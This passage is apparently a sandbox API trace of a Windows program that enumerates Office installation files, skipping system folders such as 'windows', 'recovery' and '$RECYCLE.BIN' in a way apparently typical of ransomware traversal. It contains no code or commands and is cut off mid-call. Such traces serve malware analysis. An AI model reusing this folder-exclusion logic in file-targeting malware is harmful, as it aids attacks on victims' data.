returned 1 [0137.664] lstrcmpiW (lpString1="ONFILTER.DLL", lpString2="windows") returned -1 [0137.664] lstrcmpiW (lpString1="ONFILTER.DLL", lpString2="recovery") returned -1 [0137.664] lstrcmpiW (lpString1="ONFILTER.DLL", lpString2="perflogs") returned -1 [0137.664] lstrcmpiW (lpString1="ONFILTER.DLL", lpString2="documents and settings") returned 1 [0137.664] lstrcmpiW (lpString1="ONFILTER.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.664] lstrcmpiW (lpString1="ONFILTER.DLL", lpString2="system volume information") returned -1 [0137.664] lstrcmpiW (lpString1="ONFILTER.DLL", lpString2="msocache") returned 1 [0137.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONFILTER.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONFILTER.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONFILTER.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONFILTER.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONFILTER.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONFILTER.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.664] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4cd4a32, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x19a88, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ONLNTCOMLIB.DLL", cAlternateFileName="ONLNTC~1.DLL")) returned 1 [0137.664] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2=".") returned 1 [0137.664] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2="..") returned 1 [0137.664] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2="...") returned 1 [0137.664] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2="windows") returned -1 [0137.664] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2="recovery") returned -1 [0137.664] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2="perflogs") returned -1 [0137.664] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2="documents and settings") returned 1 [0137.664] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.664] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2="system volume information") returned -1 [0137.664] lstrcmpiW (lpString1="ONLNTCOMLIB.DLL", lpString2="msocache") returned 1 [0137.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONLNTCOMLIB.DLL", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONLNTCOMLIB.DLL", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONLNTCOMLIB.DLL", lpUsedDefaultChar=0x0) returned 15 [0137.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONLNTCOMLIB.DLL", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONLNTCOMLIB.DLL", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONLNTCOMLIB.DLL", lpUsedDefaultChar=0x0) returned 15 [0137.665] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4d4679, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdc4086cd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xde4f6fc9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xed9050, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ONMAIN.DLL", cAlternateFileName="")) returned 1 [0137.665] lstrcmpiW (lpString1="ONMAIN.DLL", lpString2=".") returned 1 [0137.665] lstrcmpiW (lpString1="ONMAIN.DLL", lpString2="..") returned 1 [0137.665] lstrcmpiW (lpString1="ONMAIN.DLL", lpString2="...") returned 1 [0137.665] lstrcmpiW (lpString1="ONMAIN.DLL", lpString2="windows") returned -1 [0137.665] lstrcmpiW (lpString1="ONMAIN.DLL", lpString2="recovery") returned -1 [0137.665] lstrcmpiW (lpString1="ONMAIN.DLL", lpString2="perflogs") returned -1 [0137.665] lstrcmpiW (lpString1="ONMAIN.DLL", lpString2="documents and settings") returned 1 [0137.665] lstrcmpiW (lpString1="ONMAIN.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.665] lstrcmpiW (lpString1="ONMAIN.DLL", lpString2="system volume information") returned -1 [0137.665] lstrcmpiW (lpString1="ONMAIN.DLL", lpString2="msocache") returned 1 [0137.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONMAIN.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONMAIN.DLL", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONMAIN.DLL", lpUsedDefaultChar=0x0) returned 10 [0137.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONMAIN.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONMAIN.DLL", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONMAIN.DLL", lpUsedDefaultChar=0x0) returned 10 [0137.665] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x605aed7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b6c8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ONPPTAddin.dll", cAlternateFileName="ONPPTA~1.DLL")) returned 1 [0137.665] lstrcmpiW (lpString1="ONPPTAddin.dll", lpString2=".") returned 1 [0137.665] lstrcmpiW (lpString1="ONPPTAddin.dll", lpString2="..") returned 1 [0137.665] lstrcmpiW (lpString1="ONPPTAddin.dll", lpString2="...") returned 1 [0137.665] lstrcmpiW (lpString1="ONPPTAddin.dll", lpString2="windows") returned -1 [0137.665] lstrcmpiW (lpString1="ONPPTAddin.dll", lpString2="recovery") returned -1 [0137.665] lstrcmpiW (lpString1="ONPPTAddin.dll", lpString2="perflogs") returned -1 [0137.665] lstrcmpiW (lpString1="ONPPTAddin.dll", lpString2="documents and settings") returned 1 [0137.665] lstrcmpiW (lpString1="ONPPTAddin.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.665] lstrcmpiW (lpString1="ONPPTAddin.dll", lpString2="system volume information") returned -1 [0137.665] lstrcmpiW (lpString1="ONPPTAddin.dll", lpString2="msocache") returned 1 [0137.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONPPTAddin.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONPPTAddin.dll", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONPPTAddin.dll", lpUsedDefaultChar=0x0) returned 14 [0137.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONPPTAddin.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONPPTAddin.dll", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONPPTAddin.dll", lpUsedDefaultChar=0x0) returned 14 [0137.666] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb7f57ea, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb7f57ea, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdd01a5a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8dbe58, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ONRES.DLL", cAlternateFileName="")) returned 1 [0137.666] lstrcmpiW (lpString1="ONRES.DLL", lpString2=".") returned 1 [0137.666] lstrcmpiW (lpString1="ONRES.DLL", lpString2="..") returned 1 [0137.666] lstrcmpiW (lpString1="ONRES.DLL", lpString2="...") returned 1 [0137.666] lstrcmpiW (lpString1="ONRES.DLL", lpString2="windows") returned -1 [0137.666] lstrcmpiW (lpString1="ONRES.DLL", lpString2="recovery") returned -1 [0137.666] lstrcmpiW (lpString1="ONRES.DLL", lpString2="perflogs") returned -1 [0137.666] lstrcmpiW (lpString1="ONRES.DLL", lpString2="documents and settings") returned 1 [0137.666] lstrcmpiW (lpString1="ONRES.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.666] lstrcmpiW (lpString1="ONRES.DLL", lpString2="system volume information") returned -1 [0137.666] lstrcmpiW (lpString1="ONRES.DLL", lpString2="msocache") returned 1 [0137.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONRES.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONRES.DLL", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONRES.DLL", lpUsedDefaultChar=0x0) returned 9 [0137.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONRES.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONRES.DLL", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONRES.DLL", lpUsedDefaultChar=0x0) returned 9 [0137.666] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c8ab024, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c858, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ONWordAddin.dll", cAlternateFileName="ONWORD~1.DLL")) returned 1 [0137.666] lstrcmpiW (lpString1="ONWordAddin.dll", lpString2=".") returned 1 [0137.666] lstrcmpiW (lpString1="ONWordAddin.dll", lpString2="..") returned 1 [0137.666] lstrcmpiW (lpString1="ONWordAddin.dll", lpString2="...") returned 1 [0137.666] lstrcmpiW (lpString1="ONWordAddin.dll", lpString2="windows") returned -1 [0137.666] lstrcmpiW (lpString1="ONWordAddin.dll", lpString2="recovery") returned -1 [0137.666] lstrcmpiW (lpString1="ONWordAddin.dll", lpString2="perflogs") returned -1 [0137.666] lstrcmpiW (lpString1="ONWordAddin.dll", lpString2="documents and settings") returned 1 [0137.666] lstrcmpiW (lpString1="ONWordAddin.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.666] lstrcmpiW (lpString1="ONWordAddin.dll", lpString2="system volume information") returned -1 [0137.666] lstrcmpiW (lpString1="ONWordAddin.dll", lpString2="msocache") returned 1 [0137.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONWordAddin.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONWordAddin.dll", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONWordAddin.dll", lpUsedDefaultChar=0x0) returned 15 [0137.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONWordAddin.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONWordAddin.dll", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONWordAddin.dll", lpUsedDefaultChar=0x0) returned 15 [0137.667] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1db7a09, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1db7a09, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4ebdfb8, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1bbad0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ORGCHART.DLL", cAlternateFileName="")) returned 1 [0137.667] lstrcmpiW (lpString1="ORGCHART.DLL", lpString2=".") returned 1 [0137.667] lstrcmpiW (lpString1="ORGCHART.DLL", lpString2="..") returned 1 [0137.667] lstrcmpiW (lpString1="ORGCHART.DLL", lpString2="...") returned 1 [0137.667] lstrcmpiW (lpString1="ORGCHART.DLL", lpString2="windows") returned -1 [0137.667] lstrcmpiW (lpString1="ORGCHART.DLL", lpString2="recovery") returned -1 [0137.667] lstrcmpiW (lpString1="ORGCHART.DLL", lpString2="perflogs") returned -1 [0137.667] lstrcmpiW (lpString1="ORGCHART.DLL", lpString2="documents and settings") returned 1 [0137.667] lstrcmpiW (lpString1="ORGCHART.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.667] lstrcmpiW (lpString1="ORGCHART.DLL", lpString2="system volume information") returned -1 [0137.667] lstrcmpiW (lpString1="ORGCHART.DLL", lpString2="msocache") returned 1 [0137.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCHART.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCHART.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.667] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefcf5b24, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd42039, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa4690, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ORGCHART.EXE", cAlternateFileName="")) returned 1 [0137.667] lstrcmpiW (lpString1="ORGCHART.EXE", lpString2=".") returned 1 [0137.667] lstrcmpiW (lpString1="ORGCHART.EXE", lpString2="..") returned 1 [0137.667] lstrcmpiW (lpString1="ORGCHART.EXE", lpString2="...") returned 1 [0137.667] lstrcmpiW (lpString1="ORGCHART.EXE", lpString2="windows") returned -1 [0137.667] lstrcmpiW (lpString1="ORGCHART.EXE", lpString2="recovery") returned -1 [0137.667] lstrcmpiW (lpString1="ORGCHART.EXE", lpString2="perflogs") returned -1 [0137.667] lstrcmpiW (lpString1="ORGCHART.EXE", lpString2="documents and settings") returned 1 [0137.667] lstrcmpiW (lpString1="ORGCHART.EXE", lpString2="$RECYCLE.BIN") returned 1 [0137.667] lstrcmpiW (lpString1="ORGCHART.EXE", lpString2="system volume information") returned -1 [0137.667] lstrcmpiW (lpString1="ORGCHART.EXE", lpString2="msocache") returned 1 [0137.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.EXE", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCHART.EXE", lpUsedDefaultChar=0x0) returned 12 [0137.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHART.EXE", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCHART.EXE", lpUsedDefaultChar=0x0) returned 12 [0137.668] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1db7a09, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1db7a09, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4ee42e7, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xacac8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ORGCHWIZ.DLL", cAlternateFileName="")) returned 1 [0137.668] lstrcmpiW (lpString1="ORGCHWIZ.DLL", lpString2=".") returned 1 [0137.668] lstrcmpiW (lpString1="ORGCHWIZ.DLL", lpString2="..") returned 1 [0137.668] lstrcmpiW (lpString1="ORGCHWIZ.DLL", lpString2="...") returned 1 [0137.668] lstrcmpiW (lpString1="ORGCHWIZ.DLL", lpString2="windows") returned -1 [0137.668] lstrcmpiW (lpString1="ORGCHWIZ.DLL", lpString2="recovery") returned -1 [0137.668] lstrcmpiW (lpString1="ORGCHWIZ.DLL", lpString2="perflogs") returned -1 [0137.668] lstrcmpiW (lpString1="ORGCHWIZ.DLL", lpString2="documents and settings") returned 1 [0137.668] lstrcmpiW (lpString1="ORGCHWIZ.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.668] lstrcmpiW (lpString1="ORGCHWIZ.DLL", lpString2="system volume information") returned -1 [0137.668] lstrcmpiW (lpString1="ORGCHWIZ.DLL", lpString2="msocache") returned 1 [0137.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHWIZ.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHWIZ.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCHWIZ.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHWIZ.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGCHWIZ.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGCHWIZ.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.668] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1702fda, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1702fda, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x174f451, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x32ad8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ORGWIZ.EXE", cAlternateFileName="")) returned 1 [0137.668] lstrcmpiW (lpString1="ORGWIZ.EXE", lpString2=".") returned 1 [0137.668] lstrcmpiW (lpString1="ORGWIZ.EXE", lpString2="..") returned 1 [0137.668] lstrcmpiW (lpString1="ORGWIZ.EXE", lpString2="...") returned 1 [0137.668] lstrcmpiW (lpString1="ORGWIZ.EXE", lpString2="windows") returned -1 [0137.668] lstrcmpiW (lpString1="ORGWIZ.EXE", lpString2="recovery") returned -1 [0137.668] lstrcmpiW (lpString1="ORGWIZ.EXE", lpString2="perflogs") returned -1 [0137.668] lstrcmpiW (lpString1="ORGWIZ.EXE", lpString2="documents and settings") returned 1 [0137.668] lstrcmpiW (lpString1="ORGWIZ.EXE", lpString2="$RECYCLE.BIN") returned 1 [0137.668] lstrcmpiW (lpString1="ORGWIZ.EXE", lpString2="system volume information") returned -1 [0137.668] lstrcmpiW (lpString1="ORGWIZ.EXE", lpString2="msocache") returned 1 [0137.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGWIZ.EXE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGWIZ.EXE", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGWIZ.EXE", lpUsedDefaultChar=0x0) returned 10 [0137.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGWIZ.EXE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORGWIZ.EXE", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORGWIZ.EXE", lpUsedDefaultChar=0x0) returned 10 [0137.669] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c8d1261, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1938c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OSF.DLL", cAlternateFileName="")) returned 1 [0137.669] lstrcmpiW (lpString1="OSF.DLL", lpString2=".") returned 1 [0137.669] lstrcmpiW (lpString1="OSF.DLL", lpString2="..") returned 1 [0137.669] lstrcmpiW (lpString1="OSF.DLL", lpString2="...") returned 1 [0137.669] lstrcmpiW (lpString1="OSF.DLL", lpString2="windows") returned -1 [0137.669] lstrcmpiW (lpString1="OSF.DLL", lpString2="recovery") returned -1 [0137.669] lstrcmpiW (lpString1="OSF.DLL", lpString2="perflogs") returned -1 [0137.669] lstrcmpiW (lpString1="OSF.DLL", lpString2="documents and settings") returned 1 [0137.669] lstrcmpiW (lpString1="OSF.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.669] lstrcmpiW (lpString1="OSF.DLL", lpString2="system volume information") returned -1 [0137.669] lstrcmpiW (lpString1="OSF.DLL", lpString2="msocache") returned 1 [0137.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSF.DLL", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 